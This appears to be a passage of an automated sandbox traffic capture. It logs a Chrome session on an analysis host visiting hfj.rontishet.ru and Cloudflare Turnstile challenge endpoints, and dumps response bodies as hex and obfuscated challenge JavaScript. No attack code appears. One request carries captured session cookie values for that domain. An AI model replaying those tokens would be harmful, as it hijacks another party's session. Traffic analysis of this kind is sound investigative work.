                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:27 UTC1369INData Raw: 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 69 4e 28 31 34 38 39 29 5d 28 30 29 2c 78 3d 30 3b 38 3e 78 3b 49 3d 49 3c 3c 31 2e 38 35 7c 64 5b 69 4e 28 31 35 38 30 29 5d 28 4e 2c 31 29 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 69 4e 28 36 38 38 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 69 4e 28 34 33 33 29 5d 28 49 3c 3c 31 2c 4e 29 2c 4a 3d 3d 64 5b 69 4e 28 36 39 37 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 69 4e 28 36 38 38 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 69 4e 28 31 34 38 39 29 5d 28 30 29 2c 78 3d 30 3b 31 36 3e 78 3b 49 3d 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,I=0):J++,x++);for(N=D[iN(1489)](0),x=0;8>x;I=I<<1.85|d[iN(1580)](N,1),j-1==J?(J=0,H[iN(688)](o(I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;x<G;I=d[iN(433)](I<<1,N),J==d[iN(697)](j,1)?(J=0,H[iN(688)](o(I)),I=0):J++,N=0,x++);for(N=D[iN(1489)](0),x=0;16>x;I=I


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    17192.168.2.449746172.67.147.2154434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:27 UTC1320OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: hfj.rontishet.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://hfj.rontishet.ru/iCaWzj6Q/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: XSRF-TOKEN=eyJpdiI6Ik5Raks1QVVvbFZaaTNjUzBLdzQvN3c9PSIsInZhbHVlIjoiem1xeTJBSTJtSkJjTy9jN3k4Z0JBdVdQbjY5Smo5RkptVzhzbkxIR3d4U1lvM25IQjducmt4Sm9aSHJhbmg2WHhMSk00c2NKK1lRdm9PNi9hanpIRVVBT2NORFowbm1GMTdtbklXbm1LdlZxV2Q5dGh1MFRXcXlZOExaU0FNZmIiLCJtYWMiOiI1ODIyZjIxMjc0ZDgwMDcwM2FkMzgwOTc2ZGNmM2I1YmU2NjliMzFmY2Q3NDkxNmU0OTc4NmI4ZmRhNmZlYWRkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImsrMXNBNUNEaW1GbytaZE1iOHZDWEE9PSIsInZhbHVlIjoiUGVVUStFU1puM2VIRUpxRDVweFduS3JPaytmR3d0SlpEcmR4MjJFWmdnOGtXRDlFdm52RUg4M3JmTjJwUDZPYXJGWEhCc3F3TnQ0cVcwSU5tcUdlN0lLTWlmTmNCT0QrRkhGZUxYVTR2UGxJdjg0R1NTNUppUTNyMnpQOEpodW4iLCJtYWMiOiIyNjNiNDVlNmVlODI1Yjk4Y2RmMDhjNjNlNTI0Mjk3NjQwNmQ3ZDU5ZGYwMWNkNzQ2NTYxMmNkMWZlYWZmZWNiIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:27 UTC650INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 2368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gyxYidiwrhwpJpPU6KB7GxxPwjhNOBH%2BaxWvYcHGoNOA%2FitPGk7RSFdoY0ynWhM4B51lfDJIo0JoS33kPQooXu52G4v82gwKgixTK8j3RjDDChJFd0cGRza3hwalCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e23e894f41db-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    18192.168.2.449761104.18.95.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:27 UTC795OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/yzcnc/0x4AAAAAAAj4CaQsDLLGC_TE/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cache-control: max-age=2629800, public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e23eff2e72b3-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    19192.168.2.449762104.18.95.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cb5e237ab880f47&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 117261
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e2416e910f8d-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 6d 61 6e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: man","turnstile_verifying":"Verifying...","turnstile_success":"Success%21","turnstile_timeout":"Timed%20out","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_refresh":"Refresh","not_embedded":"This%20challeng
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 28 67 48 28 31 30 31 35 29 29 2f 31 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 48 28 36 31 31 29 29 2f 31 32 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 36 38 35 31 33 36 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 35 39 33 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4a 3d 67 49 2c 64 3d 7b 27 6d 53 4d 65 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 67 4e 64 66 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 28 29 7d 2c 27 6e 4d 4a 67 73 27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (gH(1015))/11*(-parseInt(gH(611))/12),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,685136),eM=this||self,eN=eM[gI(593)],eO=function(gJ,d,e,f,g){return gJ=gI,d={'mSMeo':function(h,i){return i==h},'gNdfN':function(h){return h()},'nMJgs'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 67 4a 28 31 35 31 38 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 67 4b 29 7b 72 65 74 75 72 6e 20 67 4b 3d 67 4a 2c 64 5b 67 4b 28 31 33 31 38 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 67 4c 29 7b 72 65 74 75 72 6e 20 67 4c 3d 67 4b 2c 67 4c 28 31 35 35 39 29 5b 67 4c 28 31 33 32 37 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 67 4f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 50 2c 4c 2c 4d 2c 4e 29 7b 69 66 28 67 4f 3d 67 4a 2c 73 3d 7b 27 75 69 71 45 61 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 3c 50 7d 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ){return h(i)}},e=String[gJ(1518)],f={'h':function(h,gK){return gK=gJ,d[gK(1318)](null,h)?'':f.g(h,6,function(i,gL){return gL=gK,gL(1559)[gL(1327)](i)})},'g':function(i,j,o,gO,s,x,B,C,D,E,F,G,H,I,J,K,P,L,M,N){if(gO=gJ,s={'uiqEa':function(O,P){return O<P},
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 3c 31 2e 36 34 7c 64 5b 67 4f 28 33 30 39 29 5d 28 4e 2c 31 29 2c 64 5b 67 4f 28 31 32 31 38 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 67 4f 28 34 37 38 29 5d 28 64 5b 67 4f 28 31 32 39 34 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 64 5b 67 4f 28 33 37 36 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d 61 74 68 5b 67 4f 28 31 31 36 35 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 67 4f 28 38 38 31 29 5d 28 49 3c 3c 31 2c 31 2e 33 32 26 4e 29 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 67 4f 28 34 37 38 29 5d 28 64 5b 67 4f 28 31 32 39 34 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <1.64|d[gO(309)](N,1),d[gO(1218)](J,j-1)?(J=0,H[gO(478)](d[gO(1294)](o,I)),I=0):J++,N>>=1,x++);}E--,d[gO(376)](0,E)&&(E=Math[gO(1165)](2,G),G++),delete C[D]}else for(N=B[D],x=0;x<G;I=d[gO(881)](I<<1,1.32&N),j-1==J?(J=0,H[gO(478)](d[gO(1294)](o,I)),I=0):J+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6b 2c 67 51 29 7b 72 65 74 75 72 6e 20 67 51 3d 62 2c 64 5b 67 51 28 31 34 30 35 29 5d 28 6a 2c 6b 29 7d 2c 27 73 6c 6c 4e 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6b 2c 67 52 29 7b 72 65 74 75 72 6e 20 67 52 3d 62 2c 64 5b 67 52 28 31 34 34 37 29 5d 28 6a 2c 6b 29 7d 2c 27 58 4a 71 70 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6b 2c 6c 2c 67 53 29 7b 72 65 74 75 72 6e 20 67 53 3d 62 2c 64 5b 67 53 28 31 35 38 29 5d 28 6a 2c 6b 2c 6c 29 7d 7d 2c 64 5b 67 54 28 35 35 32 29 5d 21 3d 3d 67 54 28 31 32 35 33 29 29 72 65 74 75 72 6e 20 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 27 27 3d 3d 68 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 67 54 28 31 33 37 30 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 6a 2c 67 55 29 7b 72 65 74 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ':function(j,k,gQ){return gQ=b,d[gQ(1405)](j,k)},'sllNN':function(j,k,gR){return gR=b,d[gR(1447)](j,k)},'XJqpl':function(j,k,l,gS){return gS=b,d[gS(158)](j,k,l)}},d[gT(552)]!==gT(1253))return h==null?'':''==h?null:f.i(h[gT(1370)],32768,function(j,gU){retu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 56 28 31 31 36 35 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 48 26 47 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 67 56 28 37 37 39 29 5d 28 30 3c 4e 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 67 56 28 31 30 39 34 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4f 2c 44 5b 67 56 28 34 37 38 29 5d 28 4f 29 3b 3b 29 7b 69 66 28 64 5b 67 56 28 31 33 39 35 29 5d 28 49 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 56 28 31 31 36 35 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 4b 21 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: break;case 1:for(J=0,K=Math[gV(1165)](2,16),F=1;K!=F;N=H&G,H>>=1,H==0&&(H=j,G=o(I++)),J|=d[gV(779)](0<N?1:0,F),F<<=1);O=d[gV(1094)](e,J);break;case 2:return''}for(E=s[3]=O,D[gV(478)](O);;){if(d[gV(1395)](I,i))return'';for(J=0,K=Math[gV(1165)](2,C),F=1;K!=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 63 6f 64 65 27 3a 67 58 28 34 32 36 29 2c 27 72 63 56 27 3a 65 4d 5b 67 58 28 31 30 34 31 29 5d 5b 67 58 28 34 37 33 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 49 28 31 33 39 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 67 59 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 29 7b 6b 3d 28 67 59 3d 67 49 2c 6a 3d 7b 7d 2c 6a 5b 67 59 28 33 36 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 67 59 28 34 32 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 67 59 28 39 34 39 29 5d 3d 67 59 28 31 32 34 38 29 2c 6a 5b 67 59 28 39 30 37 29 5d 3d 67 59 28 31 30 35 33 29 2c 6a 29 3b 74 72 79 7b 69 66 28 6c 3d 69 7c 7c 67 59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: code':gX(426),'rcV':eM[gX(1041)][gX(473)]},'*'))},g)},eM[gI(1394)]=function(g,h,i,gY,j,k,l,m,n,o,s,x,B,C,D,E){k=(gY=gI,j={},j[gY(366)]=function(F,G){return F+G},j[gY(429)]=function(F,G){return F+G},j[gY(949)]=gY(1248),j[gY(907)]=gY(1053),j);try{if(l=i||gY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 2c 75 6e 64 65 66 69 6e 65 64 2c 68 31 28 34 34 35 29 29 3a 66 5b 68 31 28 34 30 33 29 5d 28 6e 5b 68 31 28 32 37 31 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 68 32 29 7b 68 32 3d 68 31 2c 6e 5b 68 32 28 39 32 37 29 5d 28 69 2c 6a 2c 30 29 7d 29 7d 2c 31 30 29 2c 65 4d 5b 67 5a 28 31 31 36 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 33 29 7b 68 33 3d 67 5a 2c 65 4d 5b 68 33 28 31 31 36 39 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 67 5a 28 35 36 35 29 5d 5b 67 5a 28 31 34 38 36 29 5d 28 6a 5b 67 5a 28 36 33 30 29 5d 2c 6d 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 65 53 3d 7b 7d 2c 65 53 5b 67 49 28 33 34 39 29 5d 3d 65 52 2c 65 4d 5b 67 49 28 31 34 35 30 29 5d 3d 65 53 2c 65 55 3d 65 4d 5b 67 49 28 31 30 34 31 29 5d 5b 67 49 28 34 38 37 29 5d 5b 67 49 28 33 38 31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,undefined,h1(445)):f[h1(403)](n[h1(271)],function(h2){h2=h1,n[h2(927)](i,j,0)})},10),eM[gZ(1164)](function(h3){h3=gZ,eM[h3(1169)]()},1e3),eM[gZ(565)][gZ(1486)](j[gZ(630)],m));return![]},eS={},eS[gI(349)]=eR,eM[gI(1450)]=eS,eU=eM[gI(1041)][gI(487)][gI(381
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:28 UTC1369INData Raw: 4d 5b 67 49 28 36 32 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 4e 29 7b 69 66 28 69 4e 3d 67 49 2c 65 4d 5b 69 4e 28 37 38 32 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 69 4e 28 37 38 32 29 5d 3d 21 21 5b 5d 7d 2c 66 5a 3d 30 2c 65 4e 5b 67 49 28 31 32 32 36 29 5d 3d 3d 3d 67 49 28 39 34 33 29 3f 65 4e 5b 67 49 28 34 30 33 29 5d 28 67 49 28 31 35 32 32 29 2c 66 75 6e 63 74 69 6f 6e 28 6a 31 2c 63 29 7b 6a 31 3d 67 49 2c 63 3d 7b 27 4e 4f 66 52 50 27 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 66 29 7d 7d 2c 63 5b 6a 31 28 31 33 39 38 29 5d 28 73 65 74 54 69 6d 65 6f 75 74 2c 67 32 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 67 32 2c 30 29 2c 67 33 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 6a 32 2c 67 2c 68 2c 69 2c 6a
